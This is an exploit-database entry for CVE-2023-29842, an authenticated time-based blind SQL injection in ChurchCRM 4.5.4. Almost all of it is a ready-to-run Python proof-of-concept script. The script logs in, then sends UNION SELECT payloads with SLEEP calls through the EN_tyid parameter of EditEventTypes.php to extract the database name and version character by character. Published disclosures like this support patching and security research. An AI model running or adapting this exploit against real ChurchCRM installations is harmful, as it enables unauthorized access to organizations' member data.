ChurchCRM 4.5.4 SQL Injection

2023.10.16
Credit: Arvandy
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid # Date: 03-05-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md # Software Link: https://github.com/ChurchCRM/CRM/releases # Vendor Homepage: http://churchcrm.io/ # Version: 4.5.4 # Tested on: Windows, Linux # CVE: CVE-2023-29842 """ The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter. This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. This script is created as Proof of Concept to retrieve the database name and version. """ import sys, requests def injection(target, inj_str, session_cookies): for j in range(32, 126): url = "%s/EditEventTypes.php" % (target) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j))) r = requests.post(url, headers=headers, data=data) res = r.text if (r.elapsed.total_seconds () > 2 ): return j return None def retrieveDBName(session_cookies): db_name = "" print("(+) Retrieving database name, please wait") for i in range (1,100): injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): sys.stdout.write(chr(retrieved_value)) sys.stdout.flush() else: break def retrieveDBVersion(session_cookies): db_version = "" print("(+) Retrieving database version, please wait") for i in range (1,100): injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): sys.stdout.write(chr(retrieved_value)) sys.stdout.flush() else: break def login(target, username, password): target = "%s/session/begin" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "User=%s&Password=%s" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") retrieveDBName(session_cookies) print("") retrieveDBVersion(session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top